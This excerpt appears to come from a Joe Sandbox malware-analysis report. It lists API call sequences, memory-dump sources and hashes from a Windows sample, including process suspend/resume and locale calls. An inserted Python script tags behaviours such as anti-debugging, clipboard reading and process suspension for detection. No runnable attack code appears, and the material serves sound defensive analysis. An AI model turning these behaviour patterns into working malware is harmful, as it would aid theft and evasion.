                                          • String ID:
                                          • API String ID: 2058664381-0
                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                          • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenResume
                                          • String ID:
                                          • API String ID: 3614150671-0
                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction ID: dbaabbb0ea2570487ff62d8cf89bd30b477e7113d13ca21b8680662729a76e86
                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction Fuzzy Hash: 66D05E36204121E3C320176A7C0CD97AD68DBC5AA2705412AF804C26649A60CC0186E4
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                          • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenSuspend
                                          • String ID:
                                          • API String ID: 1999457699-0
                                          • Opcode ID: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                          • Instruction ID: 1e4755145751be78863ec26184204985b99a3e1fec7ed1e2fa2d7a7f5aac3163
                                          • Opcode Fuzzy Hash: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                          • Instruction Fuzzy Hash: 73D05E36104121E3C6211B6A7C0CD97AD68DFC5AA2705412AF904D26509A20CC0186E4
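The function records above list raw API sequences (IsDebuggerPresent followed by SetUnhandledExceptionFilter; OpenClipboard, GetClipboardData(0xD), CloseClipboard; OpenProcess(0x800) followed by NtSuspendProcess or NtResumeProcess) but leave the mapping to behaviour to the reader. The following Python script is an added example, not part of the Joe Sandbox report or of its tooling: it parses "APIs" blocks written in the shape this report uses and tags each function with a capability. The tag names, the rule set and the sample text (constructed from the shape of the entries above) are my own assumptions; the numeric constants (CF_UNICODETEXT = 0xD, PROCESS_SUSPEND_RESUME = 0x800) are the documented Win32 values.

```python
"""Tag Joe Sandbox function records by the Win32 API sequence they contain.

Added example: parses the text form of the report's "APIs" blocks and maps
API combinations to behaviour tags. Tag names and rules are assumptions.
"""
import re

# Constructed sample: four "APIs" blocks in the shape the report prints them.
SAMPLE_REPORT = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
APIs
• OpenClipboard.USER32(00000000), ref: 0040B74C
• GetClipboardData.USER32(0000000D), ref: 0040B758
• CloseClipboard.USER32 ref: 0040B760
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
• NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
• CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?), ref: 00448299
• EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
"""

# One call line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(args), ref: ADDR. Arguments are hex literals, '?' or strings.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 constants used by the rules below.
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0x2: "CF_BITMAP", 0xD: "CF_UNICODETEXT"}
PROCESS_SUSPEND_RESUME = 0x0800


def parse_blocks(text):
    """Split report text into a list of blocks; each block is a list of call dicts."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        match = CALL_RE.match(line)
        if match and current is not None:
            raw = match.group("args")
            current.append({
                "api": match.group("api"),
                "module": match.group("mod"),
                "args": [a.strip() for a in raw.split(",")] if raw else [],
                "ref": match.group("ref"),
                # Subcall entries were seen inside a callee, not in this function.
                "subcall": match.group("sub") is not None,
            })
    return blocks


def hexarg(args, index):
    """Return args[index] as an int if it is a hex literal; None for '?' or strings."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def tag_block(calls):
    """Apply the (assumed) behaviour rules to one function's direct API calls."""
    direct = {c["api"] for c in calls if not c["subcall"]}
    tags, detail = set(), {}
    if "IsDebuggerPresent" in direct:
        tags.add("anti_debug")
    if {"OpenClipboard", "GetClipboardData"} <= direct:
        tags.add("clipboard_read")
        for c in calls:
            if c["api"] == "GetClipboardData":
                fmt = hexarg(c["args"], 0)
                detail["clipboard_format"] = CLIPBOARD_FORMATS.get(
                    fmt, "?" if fmt is None else hex(fmt))
    if "OpenProcess" in direct and direct & {"NtSuspendProcess", "NtResumeProcess"}:
        for c in calls:
            if c["api"] == "OpenProcess":
                access = hexarg(c["args"], 0)
                # Only flag when the requested access actually permits suspend/resume.
                if access is not None and access & PROCESS_SUSPEND_RESUME:
                    tags.add("process_suspend_resume")
                    detail["access_mask"] = hex(access)
    return tags, detail


def analyse(text):
    """Return one summary dict per function block: call names, tags, details."""
    results = []
    for calls in parse_blocks(text):
        tags, detail = tag_block(calls)
        results.append({"calls": [c["api"] for c in calls],
                        "tags": tags, "detail": detail})
    return results


if __name__ == "__main__":
    for i, entry in enumerate(analyse(SAMPLE_REPORT)):
        print(i, sorted(entry["tags"]), entry["detail"], entry["calls"])
```

Subcall entries are parsed but excluded from the rule matching on purpose: the report attributes them to the callee (here the CRT locale helper at 00448295), so counting them would tag every caller of that helper. Extend the rule set by adding further API combinations to tag_block; the access-mask check shows the pattern for rules that depend on an argument value rather than on the API name alone.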
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: JD
                                          • API String ID: 1084509184-2669065882
                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                          • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                          • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                          • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                          • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FreeProcess
                                          • String ID:
                                          • API String ID: 3859560861-0
                                          • Opcode ID: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                          • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                          • Opcode Fuzzy Hash: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                          • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                          • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                          • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                          • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                          • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                          • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                          • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                          APIs
                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
